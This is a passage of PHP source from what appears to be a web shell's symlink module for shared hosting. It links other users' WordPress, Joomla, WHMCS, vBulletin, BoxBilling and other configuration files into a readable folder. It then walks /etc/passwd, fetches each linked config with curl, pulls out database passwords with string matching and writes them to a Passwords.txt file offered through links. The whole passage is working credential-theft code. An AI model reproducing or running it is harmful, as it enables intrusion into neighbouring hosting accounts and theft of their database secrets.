  1902. @symlink('/home3/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1903. @symlink('/home3/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1904. @symlink('/home3/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1905. @symlink('/home3/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1906. @symlink('/home3/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1907. @symlink('/home3/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1908. @symlink('/home3/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1909. @symlink('/home3/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1910. @symlink('/home3/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1911. @symlink('/home3/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1912. @symlink('/home3/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1913. @symlink('/home3/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1914. @symlink('/home3/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1915. @symlink('/home3/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1916. @symlink('/home3/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1917. @symlink('/home3/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1918. @symlink('/home3/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1919. @symlink('/home3/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1920. @symlink('/home3/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1921. @symlink('/home3/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1922. @symlink('/home3/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1923. @symlink('/home3/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1924. @symlink('/home3/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1925. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1926. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1927. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1928. @symlink('/home3/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1929. @symlink('/home3/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1930. @symlink('/home3/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1931. @symlink('/home3/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1932. @symlink('/home3/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1933. @symlink('/home3/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1934. @symlink('/home3/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1935. @symlink('/home3/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1936. @symlink('/home3/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1937. @symlink('/home3/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1938. @symlink('/home3/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1939. @symlink('/home3/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1940. @symlink('/home3/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1941. @symlink('/home3/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1942. @symlink('/home3/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1943. @symlink('/home3/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1944. @symlink('/home3/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1945. @symlink('/home3/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1946. @symlink('/home3/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1947. @symlink('/home3/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1948. @symlink('/home3/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1949. @symlink('/home3/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1950. @symlink('/home3/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1951. @symlink('/home3/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1952. @symlink('/home3/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1953. @symlink('/home3/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1954. @symlink('/home3/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1955. @symlink('/home3/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1956. @symlink('/home3/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1957. @symlink('/home3/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1958. @symlink('/home3/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1959. @symlink('/home3/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1960. @symlink('/home3/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1961. @symlink('/home3/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1962. @symlink('/home3/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1963. @symlink('/home3/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1964. @symlink('/home3/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1965. @symlink('/home3/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1966. @symlink('/home3/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1967. @symlink('/home3/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1968. @symlink('/home3/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1969. @symlink('/home3/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1970. @symlink('/home3/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1971. @symlink('/home3/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1972. @symlink('/home3/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1973. @symlink('/home3/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1974. @symlink('/home3/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1975. @symlink('/home3/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1976. @symlink('/home3/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1977. @symlink('/home3/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1978. @symlink('/home3/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1979.  
  1980. //Home4
  1981.  
  1982. @symlink('/home4/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1983. @symlink('/home4/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1984. @symlink('/home4/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1985. @symlink('/home4/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1986. @symlink('/home4/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1987. @symlink('/home4/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1988. @symlink('/home4/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1989. @symlink('/home4/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1990. @symlink('/home4/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1991. @symlink('/home4/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1992. @symlink('/home4/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1993. @symlink('/home4/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1994. @symlink('/home4/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1995. @symlink('/home4/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1996. @symlink('/home4/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1997. @symlink('/home4/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1998. @symlink('/home4/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1999. @symlink('/home4/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  2000. @symlink('/home4/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  2001. @symlink('/home4/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  2002. @symlink('/home4/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  2003. @symlink('/home4/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  2004. @symlink('/home4/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  2005. @symlink('/home4/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  2006. @symlink('/home4/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  2007. @symlink('/home4/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  2008. @symlink('/home4/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  2009. @symlink('/home4/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  2010. @symlink('/home4/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  2011. @symlink('/home4/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  2012. @symlink('/home4/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  2013. @symlink('/home4/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  2014. @symlink('/home4/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  2015. @symlink('/home4/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  2016. @symlink('/home4/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  2017. @symlink('/home4/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  2018. @symlink('/home4/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  2019. @symlink('/home4/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  2020. @symlink('/home4/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  2021. @symlink('/home4/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  2022. @symlink('/home4/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  2023. @symlink('/home4/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  2024. @symlink('/home4/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  2025. @symlink('/home4/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  2026. @symlink('/home4/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  2027. @symlink('/home4/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  2028. @symlink('/home4/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  2029. @symlink('/home4/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  2030. @symlink('/home4/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  2031. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2032. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2033. @symlink('/home4/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  2034. @symlink('/home4/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  2035. @symlink('/home4/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  2036. @symlink('/home4/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  2037. @symlink('/home4/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  2038. @symlink('/home4/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  2039. @symlink('/home4/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  2040. @symlink('/home4/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  2041. @symlink('/home4/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  2042. @symlink('/home4/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  2043. @symlink('/home4/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  2044. @symlink('/home4/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  2045. @symlink('/home4/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  2046. @symlink('/home4/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  2047. @symlink('/home4/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  2048. @symlink('/home4/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  2049. @symlink('/home4/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  2050. @symlink('/home4/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  2051. @symlink('/home4/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  2052. @symlink('/home4/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  2053. @symlink('/home4/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  2054. @symlink('/home4/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  2055. @symlink('/home4/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  2056. @symlink('/home4/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  2057. @symlink('/home4/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  2058. @symlink('/home4/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  2059. @symlink('/home4/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  2060. @symlink('/home4/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  2061. @symlink('/home4/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  2062. @symlink('/home4/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  2063. @symlink('/home4/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  2064. @symlink('/home4/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  2065. @symlink('/home4/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  2066. @symlink('/home4/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  2067. @symlink('/home4/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  2068. @symlink('/home4/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  2069. @symlink('/home4/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  2070. @symlink('/home4/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  2071. @symlink('/home4/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  2072. @symlink('/home4/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  2073. @symlink('/home4/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  2074. @symlink('/home4/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  2075. @symlink('/home4/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  2076. @symlink('/home4/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  2077. @symlink('/home4/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  2078. @symlink('/home4/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  2079. @symlink('/home4/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  2080. @symlink('/home4/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  2081. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2082. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2083. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2084. @symlink('/home4/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  2085. @symlink('/home4/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  2086. @symlink('/home4/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  2087. @symlink('/home4/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  2088. @symlink('/home4/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  2089. @symlink('/home4/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  2090. @symlink('/home4/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  2091. @symlink('/home4/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  2092. @symlink('/home4/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  2093. @symlink('/home4/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  2094. @symlink('/home4/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  2095. @symlink('/home4/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  2096. @symlink('/home4/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  2097. @symlink('/home4/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  2098. @symlink('/home4/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  2099. @symlink('/home4/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2100. @symlink('/home4/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2101. @symlink('/home4/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2102. @symlink('/home4/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2103. @symlink('/home4/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2104. @symlink('/home4/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2105. @symlink('/home4/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  2106. @symlink('/home4/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  2107. @symlink('/home4/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  2108. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2109. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2110. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2111. @symlink('/home4/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2112. @symlink('/home4/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2113. @symlink('/home4/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2114. @symlink('/home4/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2115. @symlink('/home4/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2116. @symlink('/home4/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2117. @symlink('/home4/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2118. @symlink('/home4/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2119. @symlink('/home4/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2120. @symlink('/home4/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2121. @symlink('/home4/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2122. @symlink('/home4/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2123. @symlink('/home4/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2124. @symlink('/home4/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2125. @symlink('/home4/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2126. @symlink('/home4/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2127. @symlink('/home4/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2128. @symlink('/home4/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2129. @symlink('/home4/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2130. @symlink('/home4/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2131. @symlink('/home4/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2132. @symlink('/home4/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2133. @symlink('/home4/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2134. @symlink('/home4/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2135. @symlink('/home4/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2136. @symlink('/home4/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2137. @symlink('/home4/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2138. @symlink('/home4/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2139. @symlink('/home4/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2140. @symlink('/home4/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2141. @symlink('/home4/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2142. @symlink('/home4/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2143. @symlink('/home4/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2144. @symlink('/home4/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2145. @symlink('/home4/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2146. @symlink('/home4/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2147. @symlink('/home4/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2148. @symlink('/home4/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2149. @symlink('/home4/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2150. @symlink('/home4/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2151. @symlink('/home4/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2152. @symlink('/home4/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2153. @symlink('/home4/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2154. @symlink('/home4/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2155. @symlink('/home4/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2156. @symlink('/home4/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2157. @symlink('/home4/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2158. @symlink('/home4/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2159. @symlink('/home4/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2160. @symlink('/home4/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2161. @symlink('/home4/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2162.  
  2163. }
  2164.  
  2165. //password grab
  2166.  
  2167. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
  2168. {
  2169.  
  2170. $ar0=explode($marqueurDebutLien, $text);
  2171. $ar1=explode($marqueurFinLien, $ar0[1]);
  2172. $ar=trim($ar1[0]);
  2173. return $ar;
  2174. }
  2175.  
  2176. $ffile=fopen('Passwords.txt','a+');
  2177.  
  2178.  
  2179. $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/cox_symconf/";
  2180. $re=$r;
  2181. $confi=array("-Wordpress.txt","-Joomla.txt","-WHMCS.txt","-Vbulletin.txt","-Other.txt","-Zencart.txt","-Hostbills.txt","-SMF.txt","-Drupal.txt","-OsCommerce.txt","-MyBB.txt","-PHPBB.txt","-IPB.txt","-BoxBilling.txt");
  2182.  
  2183. $users=file("/etc/passwd");
  2184. foreach($users as $user)
  2185. {
  2186.  
  2187. $str=explode(":",$user);
  2188. $usersss=$str[0];
  2189. foreach($confi as $co)
  2190. {
  2191.  
  2192.  
  2193. $uurl=$re.$usersss.$co;
  2194. $uel=$uurl;
  2195.  
  2196. $ch = curl_init();
  2197.  
  2198. curl_setopt($ch, CURLOPT_URL, $uel);
  2199. curl_setopt($ch, CURLOPT_HEADER, 1);
  2200. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2201. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  2202. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
  2203. $result['EXE'] = curl_exec($ch);
  2204. curl_close($ch);
  2205. $uxl=$result['EXE'];
  2206.  
  2207.  
  2208. if($uxl && preg_match('/table_prefix/i',$uxl))
  2209. {
  2210.  
  2211. //Wordpress
  2212.  
  2213. $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
  2214. if(!empty($dbp))
  2215. $pass=$dbp."\n";
  2216. fwrite($ffile,$pass);
  2217.  
  2218. }
  2219. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
  2220. {
  2221.  
  2222. //WHMCS
  2223.  
  2224. $dbp=entre2v2($uxl,"db_password = '","';");
  2225. if(!empty($dbp))
  2226. $pass=$dbp."\n";
  2227. fwrite($ffile,$pass);
  2228.  
  2229. }
  2230.  
  2231.  
  2232. elseif($uxl && preg_match('/dbprefix/i',$uxl))
  2233. {
  2234.  
  2235. //Joomla
  2236.  
  2237. $db=entre2v2($uxl,"password = '","';");
  2238. if(!empty($db))
  2239. $pass=$db."\n";
  2240. fwrite($ffile,$pass);
  2241. }
  2242. elseif($uxl && preg_match('/admincpdir/i',$uxl))
  2243. {
  2244.  
  2245. //Vbulletin
  2246.  
  2247. $db=entre2v2($uxl,"password'] = '","';");
  2248. if(!empty($db))
  2249. $pass=$db."\n";
  2250. fwrite($ffile,$pass);
  2251.  
  2252. }
  2253. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
  2254. {
  2255.  
  2256. //Other
  2257.  
  2258. $db=entre2v2($uxl,"DB_PASSWORD', '","');");
  2259. if(!empty($db))
  2260. $pass=$db."\n";
  2261. fwrite($ffile,$pass);
  2262. }
  2263. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2264. {
  2265.  
  2266. //Other
  2267.  
  2268. $db=entre2v2($uxl,"dbpass = '","';");
  2269. if(!empty($db))
  2270. $pass=$db."\n";
  2271. fwrite($ffile,$pass);
  2272. }
  2273. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2274. {
  2275.  
  2276. //Other
  2277.  
  2278. $db=entre2v2($uxl,"dbpass = '","';");
  2279. if(!empty($db))
  2280. $pass=$db."\n";
  2281. fwrite($ffile,$pass);
  2282.  
  2283. }
  2284. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2285. {
  2286.  
  2287. //Other
  2288.  
  2289. $db=entre2v2($uxl,"dbpass = \"","\";");
  2290. if(!empty($db))
  2291. $pass=$db."\n";
  2292. fwrite($ffile,$pass);
  2293. }
  2294.  
  2295.  
  2296. }
  2297. }
  2298. echo "<center>
  2299. <a href=\"cox_symconf/root/\">Root Server</a>
  2300. <br><a href=\"cox_symconf/Passwords.txt\">Passwords</a>
  2301. <br><a href=\"cox_symconf/\">Configurations</a></center>";
  2302. }
  2303. else
